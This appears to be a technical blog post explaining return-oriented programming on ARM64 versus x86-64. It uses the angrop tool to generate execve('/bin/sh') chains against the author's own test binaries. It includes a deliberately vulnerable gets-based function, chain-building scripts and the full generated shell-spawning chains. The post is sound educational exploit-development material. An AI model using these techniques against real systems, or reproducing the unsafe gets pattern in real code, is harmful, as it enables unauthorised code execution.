Return-oriented programming (ROP) is fairly trivial for architectures like x86-64 with stack-based returns which transfer control to a return address located on the stack. However, on ARM64, software can't write directly to the program counter. It can only be updated through branches and exception entries or returns. This makes stack-based returns in the x86-64 sense impossible.
Naturally, this key architectural difference means that the structure of ROP chains differs between x86-64 and ARM64. It also makes manually crafting ARM64 chains far less practical, which lends the architecture to ROP chain generators instead.
On x86-64, typical ROP gadgets end with a ret
instruction which pops the value from the top of the stack
specified by rsp into the program counter
rip. This makes gadget chaining easy since the stack
pointer, which functions as a quasi program counter, is
automatically advanced to the next gadget on the stack.
Below is a hypothetical stack view of an x86-64 ROP chain that
writes 0xdeadbeef to rdi and
0xfeedface to rsi:
    0x0000000000000000: pop %rdi; ret
    0x0000000000000008: 0xdeadbeef
    0x0000000000000010: pop %rsi; ret
    0x0000000000000018: 0xfeedface

Here's how the ROP chain executes:
1. Execution enters the first gadget with the stack pointer at 0x8.
2. pop %rdi pops 0xdeadbeef into rdi. Now the stack pointer is at 0x10.
3. ret transfers control to the address at 0x10. Now the stack pointer is at 0x18.
4. pop %rsi pops 0xfeedface into rsi. Now the stack pointer is at 0x20.
5. ret transfers control to the address at 0x20. Now the stack pointer is at 0x28.

On architectures with stack-based returns, ROP chains automatically chain themselves together since the return instruction transfers control to the next gadget on the stack. You just place all your gadgets on the stack, padding where necessary, and they execute in that order.
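The walkthrough above can be replayed with a tiny Python model. This is only an illustrative sketch: the gadgets are stand-in Python functions rather than real machine code, and the names `pop_reg`, `run_x86_chain`, and the `HALT` sentinel are made up for the example.

```python
# Toy model of an x86-64 ROP chain: `ret` pops the next gadget off the stack.
HALT = "halt"  # hypothetical sentinel marking the end of the chain


def pop_reg(name):
    """Build a model of a `pop %reg; ret` gadget."""
    def gadget(regs, stack):
        regs[name] = stack[regs["rsp"]]  # pop %reg
        regs["rsp"] += 8
    return gadget


def run_x86_chain(stack, entry_sp):
    """Run gadgets until the HALT sentinel is popped; return the registers."""
    regs = {"rsp": entry_sp}
    while True:
        target = stack[regs["rsp"]]  # ret: pop the next gadget address
        regs["rsp"] += 8
        if target == HALT:
            return regs
        target(regs, stack)


# Same layout as the stack view, with a sentinel added at 0x20.
stack = {
    0x00: pop_reg("rdi"),
    0x08: 0xDEADBEEF,
    0x10: pop_reg("rsi"),
    0x18: 0xFEEDFACE,
    0x20: HALT,
}
regs = run_x86_chain(stack, entry_sp=0x00)
```

Note that no gadget mentions the next gadget: the loop's `ret` step does all the chaining, which is the property the ARM64 section shows to be missing.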
ARM64 has a ret instruction too. However, instead
of popping a return address off the stack into the program
counter pc, it branches to the address held in the link
register lr. Simple gadgets still end with a ret instruction,
but you have to advance to the next gadget manually by setting lr
in the gadget. Since ret is really just a branch,
you can substitute it with any branch instruction as long as you
control the destination.
Below is a hypothetical stack view of an ARM64 ROP chain that
writes 0xdeadbeef to x0 and
0xfeedface to x1:
    0x0000000000000000: ldr x0, [sp]; ldr lr, [sp, #0x8], #0x10; ret
    0x0000000000000008: 0xdeadbeef
    0x0000000000000010: ldr x1, [sp]; ldr lr, [sp, #0x8], #0x10; ret
    0x0000000000000018: 0xfeedface
Here's how the ROP chain executes:
1. Execution enters the first gadget with the stack pointer at 0x8.
2. ldr x0, [sp] loads 0xdeadbeef into x0.
3. ldr lr, [sp, #0x8], #0x10 loads the value at 0x10 into lr and adds 0x10 to the stack pointer. Now the stack pointer is at 0x18.
4. ret transfers control to the address in lr.
5. ldr x1, [sp] loads 0xfeedface into x1.
6. ldr lr, [sp, #0x8], #0x10 loads the value at 0x20 into lr and adds 0x10 to the stack pointer. Now the stack pointer is at 0x28.
7. ret transfers control to the address in lr.

Notice how the gadgets have to manually chain themselves
together. They have to get the address of the next gadget into
lr before ret is executed.
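The same steps can be modelled in Python to make the manual chaining explicit. As before, this is a rough sketch rather than an emulator: `load_reg`, `run_arm64_chain`, and the `HALT` sentinel are invented names, and each gadget is a stand-in for the hypothetical `ldr <reg>, [sp]; ldr lr, [sp, #0x8], #0x10; ret` sequence from the stack view.

```python
# Toy model of an ARM64 ROP chain: each gadget must load lr itself.
HALT = "halt"  # hypothetical sentinel marking the end of the chain


def load_reg(name):
    """Model of `ldr <reg>, [sp]; ldr lr, [sp, #0x8], #0x10; ret`."""
    def gadget(regs, stack):
        regs[name] = stack[regs["sp"]]        # ldr <reg>, [sp]
        regs["lr"] = stack[regs["sp"] + 0x8]  # load the next gadget into lr
        regs["sp"] += 0x10                    # advance sp by hand
        return regs["lr"]                     # ret: branch to lr
    return gadget


def run_arm64_chain(stack, entry, entry_sp):
    """Follow the lr values the gadgets return until HALT is reached."""
    regs = {"sp": entry_sp, "lr": None}
    target = entry
    while target != HALT:
        target = target(regs, stack)
    return regs


# Same layout as the stack view, with a sentinel added at 0x20.
stack = {
    0x00: load_reg("x0"),
    0x08: 0xDEADBEEF,
    0x10: load_reg("x1"),
    0x18: 0xFEEDFACE,
    0x20: HALT,
}
regs = run_arm64_chain(stack, entry=stack[0x00], entry_sp=0x08)
```

Unlike the x86-64 model, the run loop here never touches the stack. If a gadget failed to set `lr`, the loop would have nowhere to go.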
Unfortunately, you'll never find gadgets like these in the wild: gadgets which perfectly advance the stack pointer up the stack. The offsets you see here were chosen for simplicity. Usually, you'll find that the stack offsets in loads and stores are rather large, which inflates the chain with padding.
Normally, I write ROP chains manually. This requires
running ROPgadget
on relevant binaries and then combing through their gadgets to
build up a chain. This works fine for architectures where you're
likely to find simple gadgets with no side effects or
dependencies. However, these sorts of gadgets rarely exist in
ARM64 binaries.
Take the glibc on my system for example, a supposed trove of
gadgets. On x86-64, say you wanted to set rdi to a
value. That's no problem, pop rdi; ret exists. Want
to set rsi too? pop rsi; ret exists. On
ARM64, say you want to set x0 to a value. Well you
have ldr x0, [sp, #0x10]; ldp fp, lr, [sp], #0x20;
ret. But then say you want to set x1 too. Now
the gadgets become more constrained. ldr x1, [sp, #0x20];
add sp, sp, #0xb0; br x16 was literally the nicest gadget
I could find. However, it requires you to control
x16 to continue your chain. So that's yet another
gadget you'll have to find. And what if that gadget requires you
to control a different register? The dependencies just keep on
growing.
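To make the padding cost concrete, here is a rough sketch of the stack frame consumed by the first ARM64 gadget mentioned above, `ldr x0, [sp, #0x10]; ldp fp, lr, [sp], #0x20; ret`. The helper name `frame_for_set_x0` and the next-gadget address `0x400abc` are placeholders invented for illustration.

```python
import struct


def frame_for_set_x0(x0_value, next_gadget, fp=0):
    """Lay out the 0x20 bytes consumed by
    `ldr x0, [sp, #0x10]; ldp fp, lr, [sp], #0x20; ret`."""
    frame = bytearray(0x20)                           # zero-filled by default
    struct.pack_into("<Q", frame, 0x00, fp)           # ldp: fp <- [sp]
    struct.pack_into("<Q", frame, 0x08, next_gadget)  # ldp: lr <- [sp, #0x8]
    struct.pack_into("<Q", frame, 0x10, x0_value)     # ldr x0, [sp, #0x10]
    return bytes(frame)                               # [sp, #0x18] is padding


# 0x400abc is a made-up address standing in for the next gadget.
frame = frame_for_set_x0(0xDEADBEEF, next_gadget=0x400ABC)
```

Setting a single register costs 32 bytes here, versus 16 for `pop rdi; ret` on x86-64, and that is for one of the friendlier gadgets.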
I wondered if there was a better way to write ROP chains,
something more automated. Like, was there an angr but for ROP?
A tool where I could say "here is a set of gadgets, now find
the sequence of gadgets that results in this state". Well, it
turns out that exact tool exists: angrop.
angrop's made by the same great people who made
angr. It's built on top of angr's
symbolic execution engine, and uses constraint solving for
generating ROP chains. Most importantly, it understands the
effects of gadgets.
I wrote test programs for x86-64 and ARM64 to test
angrop's ROP chain generation. Each test program was
statically linked with glibc and had a vulnerable function
vuln which called gets with the current
stack frame's base as its argument. I wanted to see if I could
generate a ROP chain which would write "/bin/sh" to
writable memory, and make an execve system call to
it. It's important to note that while the test programs are
statically linked with glibc, they don't include all of glibc's
gadgets. Nevertheless, there'll still be more than enough to play
with.
Here's the architecture-independent program:
    extern void vuln();

    int main() {
        vuln();
    }
Here's the x86-64 vulnerable function:
        .global vuln
        .type vuln, @function
    vuln:
        push %rbp
        mov %rsp, %rbp
        mov %rbp, %rdi
        call gets
        pop %rbp
        ret
        .size vuln, .-vuln
And here's the ARM64 vulnerable function:
        .global vuln
        .type vuln, @function
    vuln:
        stp fp, lr, [sp, #-16]!
        mov x0, sp
        bl gets
        ldp fp, lr, [sp], #16
        ret
        .size vuln, .-vuln
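In both versions of vuln, gets starts writing at the slot holding the saved frame pointer, so the saved return address (the pushed return address on x86-64, the saved lr on ARM64) sits 8 bytes into the buffer. A minimal sketch of turning a list of chain words into input for either program might look like this. The name `build_payload` and the example addresses are assumptions for illustration, not part of the test programs.

```python
import struct

SAVED_FP_SIZE = 8  # saved rbp (x86-64) or fp (ARM64) at the start of the buffer


def build_payload(chain_words):
    """Prefix a chain of 64-bit words with filler for the saved frame pointer."""
    payload = b"A" * SAVED_FP_SIZE
    payload += b"".join(struct.pack("<Q", word) for word in chain_words)
    if b"\n" in payload:
        # gets() stops reading at the first newline, truncating the chain.
        raise ValueError("payload contains a newline byte (0x0a)")
    return payload


# Made-up gadget address followed by a data word.
payload = build_payload([0x401000, 0xDEADBEEF])
```

The newline check matters more than it looks: null bytes pass through gets untouched, but any address or constant containing 0x0a cuts the input short.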
Each program using angrop typically begins with
the following:
    import angr, angrop

    p = angr.Project("pathname")
    rop = p.analyses.ROP()
Similar to using angr, the first step is to load
a binary into a project. Then, to use angrop, you
need to instantiate an angrop.ROP object for gadget
finding.
Currently angrop is aware of no gadgets. You can
either search for them in the binary or import them. You'll need
to search for them in the binary at least once. However, since
searching takes a bit of time and there's no gadget cache, you'll
also want to save the gadgets:
    rop.find_gadgets()
    rop.save_gadgets("gadgets")
Now on subsequent runs, you can replace the above lines with:
rop.load_gadgets("gadgets")
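Rather than swapping lines by hand between runs, the two cases can be folded into one helper. The sketch below only relies on the three methods used above (`find_gadgets`, `save_gadgets`, `load_gadgets`). The helper name `find_or_load_gadgets` is made up, and `FakeROP` is a stand-in so the example runs without angr installed.

```python
import os
import tempfile


def find_or_load_gadgets(rop, cache_path):
    """Search for gadgets once, then reuse the saved results on later runs."""
    if os.path.exists(cache_path):
        rop.load_gadgets(cache_path)
        return "loaded"
    rop.find_gadgets()
    rop.save_gadgets(cache_path)
    return "searched"


class FakeROP:
    """Stand-in for the real analysis object; it only records calls."""

    def __init__(self):
        self.calls = []

    def find_gadgets(self):
        self.calls.append("find")

    def save_gadgets(self, path):
        self.calls.append("save")
        with open(path, "wb") as cache_file:
            cache_file.write(b"")

    def load_gadgets(self, path):
        self.calls.append("load")


with tempfile.TemporaryDirectory() as tmp:
    cache = os.path.join(tmp, "gadgets")
    first, second = FakeROP(), FakeROP()
    first_result = find_or_load_gadgets(first, cache)    # cache is missing
    second_result = find_or_load_gadgets(second, cache)  # cache now exists
```

With the real object, the call would presumably be `find_or_load_gadgets(rop, "gadgets")`. Remember to delete the cache file whenever the binary or the search options change.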
With these gadgets you can construct a ROP chain using
angr's symbolic execution engine.
angrop provides helper functions which among other
things can set registers, call functions, and write to
memory.
Here's how you'd create the x86-64 ROP chain:
    # Pick a writable segment to hold the "/bin/sh" string.
    obj = p.loader.main_object
    segment = next(s for s in obj.segments if s.is_writable)
    syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "syscall ; ret ")

    # execve("/bin/sh", NULL, NULL): syscall number 59 goes in rax.
    chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00")
    chain += rop.set_regs(rax=59, rdi=segment.vaddr, rsi=0, rdx=0)
    chain.add_gadget(syscall_gadget)
And here's how you'd create the ARM64 ROP chain:
    # Pick a writable segment to hold the "/bin/sh" string.
    obj = p.loader.main_object
    segment = next(s for s in obj.segments if s.is_writable)
    syscall_gadget = next(g for g in rop.syscall_gadgets if g.dstr() == "svc #0; ret ")

    # execve("/bin/sh", NULL, NULL): syscall number 221 goes in x8.
    chain = rop.write_to_mem(segment.vaddr, b"/bin/sh\x00")
    chain += rop.set_regs(x8=221, x0=segment.vaddr, x1=0, x2=0)
    chain.add_gadget(syscall_gadget)
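The two snippets differ only in the Linux syscall convention: which register carries the syscall number, what execve's number is, and which registers carry the arguments. A small table captures that difference. The names `ExecveConvention`, `CONVENTIONS`, and `execve_regs` are invented for this sketch.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ExecveConvention:
    number_reg: str   # register holding the syscall number
    number: int       # execve's syscall number on Linux
    arg_regs: tuple   # registers for path, argv, envp
    instruction: str  # instruction that enters the kernel


CONVENTIONS = {
    "x86-64": ExecveConvention("rax", 59, ("rdi", "rsi", "rdx"), "syscall"),
    "arm64": ExecveConvention("x8", 221, ("x0", "x1", "x2"), "svc #0"),
}


def execve_regs(arch, path_addr):
    """Return the register assignments for execve(path_addr, NULL, NULL)."""
    conv = CONVENTIONS[arch]
    regs = {conv.number_reg: conv.number}
    regs.update(zip(conv.arg_regs, (path_addr, 0, 0)))
    return regs


x86_regs = execve_regs("x86-64", 0x498000)
arm64_regs = execve_regs("arm64", 0x490000)
```

Since `set_regs` takes registers as keyword arguments in the snippets above, the result could plausibly be passed along as `rop.set_regs(**execve_regs("arm64", segment.vaddr))`.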
The above ROP chain generation code will only work if there
are sufficient gadgets to satisfy the ROP chain's constraints.
This depends entirely on the gadgets the gadget finder
finds. The gadget finder class angrop.ROP accepts
several arguments in its constructor to configure the search
criteria. I found that the defaults worked perfectly for x86-64.
However, that wasn't the case with ARM64.
I had to change the instantiation to:
rop = p.analyses.ROP(fast_mode=False, max_block_size=64)
The issue was caused by the default value of the
max_block_size argument which controls the maximum
gadget length in bytes. For x86-64 the default size is 12. This
is fine since x86-64 gadgets aren't typically long and x86-64 has
variable length instructions. For ARM64, the default size is 40.
With a fixed instruction length of 4 bytes, this means a gadget
can contain at most 10 instructions. This may seem like enough,
but as you've seen, ARM64 gadgets aren't pretty: they can be
long. And in glibc, long they are.
I noticed that the gadget finder wasn't able to set
x0 even though such a gadget existed. However, said
gadget was over 10 instructions long! I found that setting the
value to 64, which allows up to 16 instructions, was more
reasonable: it found better, albeit more complicated, gadgets. I
also found that I had to set fast_mode to False to
prevent max_block_size from being overridden. The
only trade-off of a larger maximum block size was search speed,
but that's fine since you only have to search once.
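The instruction counts quoted above follow directly from ARM64's fixed 4-byte instruction size. As a quick check (the helper name is made up for this sketch, and it assumes the limit is applied purely as a byte count):

```python
ARM64_INSN_BYTES = 4  # every A64 instruction is 4 bytes long


def max_arm64_instructions(max_block_size):
    """Largest number of A64 instructions that fit in a block of this size."""
    return max_block_size // ARM64_INSN_BYTES


default_limit = max_arm64_instructions(40)  # the ARM64 default quoted above
raised_limit = max_arm64_instructions(64)   # the value I switched to
```

The same arithmetic doesn't carry over to x86-64, where a 12-byte block can hold anywhere from one long instruction to a dozen single-byte ones.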
In the end, for both architectures, angrop was
able to successfully generate ROP chains to pop a shell.
Here's the generated x86-64 ROP chain:
    0x0000000000000000: pop %rdi; ret
    0x0000000000000008: 0x497f68
    0x0000000000000010: pop %rsi; add $0x9340, %eax; ret
    0x0000000000000018: 0x68732f6e69622f
    0x0000000000000020: mov %rsi, 0x98(%rdi); ret
    0x0000000000000028: pop %rdi; ret
    0x0000000000000030: 0x498000
    0x0000000000000038: pop %rsi; ret
    0x0000000000000040: 0x0
    0x0000000000000048: pop %rax; pop %rdx; pop %rbx; ret
    0x0000000000000050: 0x3b
    0x0000000000000058: 0x0
    0x0000000000000060: 0x0
    0x0000000000000068: syscall; ret
And here's the ARM64 ROP chain:
    0x0000000000000000: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; add x0, x0, x2; ret
    0x0000000000000008: 0x0
    0x0000000000000010: ldr x3, [sp, #0x10]; mov x0, x3; ldp fp, lr, [sp], #0x40; ret
    0x0000000000000018: 0x0
    0x0000000000000020: 0x48ffd0
    0x0000000000000028: 0x0
    0x0000000000000030: str x0, [x2, #0x30]; mov w0, #0; ldp fp, lr, [sp], #0x20; ret
    0x0000000000000038: 0x68732f6e69622f
    0x0000000000000040: 0x0
    0x0000000000000048: 0x0
    0x0000000000000050: 0x0
    0x0000000000000058: 0x0
    0x0000000000000060: 0x0
    0x0000000000000068: 0x0
    0x0000000000000070: ldr x2, [sp, #0x18]; ldp fp, lr, [sp], #0x20; mov x0, x2; ret
    0x0000000000000078: 0x0
    0x0000000000000080: 0x0
    0x0000000000000088: 0x0
    0x0000000000000090: mov x16, x0; ldp q0, q1, [sp, #0x50]; ldp q2, q3, [sp, #0x70]; ldp q4, q5, [sp, #0x90]; ldp q6, q7, [sp, #0xb0]; ldp x0, x1, [sp, #0x40]; ldp x2, x3, [sp, #0x30]; ldp x4, x5, [sp, #0x20]; ldp x6, x7, [sp, #0x10]; ldp x8, x9, [sp], #0xd0; ldp x17, lr, [sp], #0x10; br x16
    0x0000000000000098: 0x0
    0x00000000000000a0: svc #0; ret
    0x00000000000000a8: 0xdd
    0x00000000000000b0: 0x0
    0x00000000000000b8: 0x0
    0x00000000000000c0: 0x0
    0x00000000000000c8: 0x0
    0x00000000000000d0: 0x0
    0x00000000000000d8: 0x0
    0x00000000000000e0: 0x0
    0x00000000000000e8: 0x490000
    0x00000000000000f0: 0x0
    0x00000000000000f8: 0x0
    0x0000000000000100: 0x0
    0x0000000000000108: 0x0
    0x0000000000000110: 0x0
    0x0000000000000118: 0x0
    0x0000000000000120: 0x0
    0x0000000000000128: 0x0
    0x0000000000000130: 0x0
    0x0000000000000138: 0x0
    0x0000000000000140: 0x0
    0x0000000000000148: 0x0
    0x0000000000000150: 0x0
    0x0000000000000158: 0x0
    0x0000000000000160: 0x0
    0x0000000000000168: 0x0
    0x0000000000000170: 0x0
    0x0000000000000178: 0x0
    0x0000000000000180: 0x0
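A few of the constants in the two chains can be sanity-checked with plain arithmetic. The sketch below makes one assumption worth flagging: it reads the offsets in the ARM64 store gadget and in the large gadget's `ldp x2, x3` as `#0x30`. All variable names are invented for the example.

```python
import struct

# "/bin/sh" as it appears in both chains: one little-endian 64-bit word.
binsh_bytes = struct.pack("<Q", 0x68732F6E69622F)

# x86-64: `mov %rsi, 0x98(%rdi)` stores to rdi + 0x98.
x86_store_target = 0x497F68 + 0x98

# ARM64 (assumption: the store gadget's offset is #0x30).
arm64_store_target = 0x48FFD0 + 0x30

# The large ARM64 gadget at 0x90, split into its instructions.
big_gadget = (
    "mov x16, x0; ldp q0, q1, [sp, #0x50]; ldp q2, q3, [sp, #0x70]; "
    "ldp q4, q5, [sp, #0x90]; ldp q6, q7, [sp, #0xb0]; "
    "ldp x0, x1, [sp, #0x40]; ldp x2, x3, [sp, #0x30]; "
    "ldp x4, x5, [sp, #0x20]; ldp x6, x7, [sp, #0x10]; "
    "ldp x8, x9, [sp], #0xd0; ldp x17, lr, [sp], #0x10; br x16"
)
big_gadget_insns = [insn.strip() for insn in big_gadget.split(";")]
big_gadget_bytes = 4 * len(big_gadget_insns)  # fixed 4-byte instructions
```

The store targets line up with the addresses later loaded into rdi (0x498000) and x0 (0x490000). At 12 instructions, or 48 bytes, the large gadget is also too long for a 40-byte block limit but fits within 64.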
Both are impressive, but I was far more impressed by the ARM64
chain. It's faster to just throw it at the binary than to attempt
to statically analyze it. I mean, just look at the mammoth gadget
at 0x90! It's like looking at the output of a
compiler. Some things just aren't immediately clear at all. But
the compiler, or in this case angrop, can see right
through it.
I've come to the conclusion that practical ROP is just harder on ARM64 than on x86-64. Now I'm no ROP historian, but maybe the technique was first discovered on an architecture with stack-based returns. I don't know, a part of me just feels like it was made for the x86 architecture family.
So, if you're ever knee-deep in crafting an x86-64 ROP chain
and things are getting a bit hairy, just remember that it could
be worse. Instead, you could be knee-deep in crafting an ARM64 ROP
chain without angrop.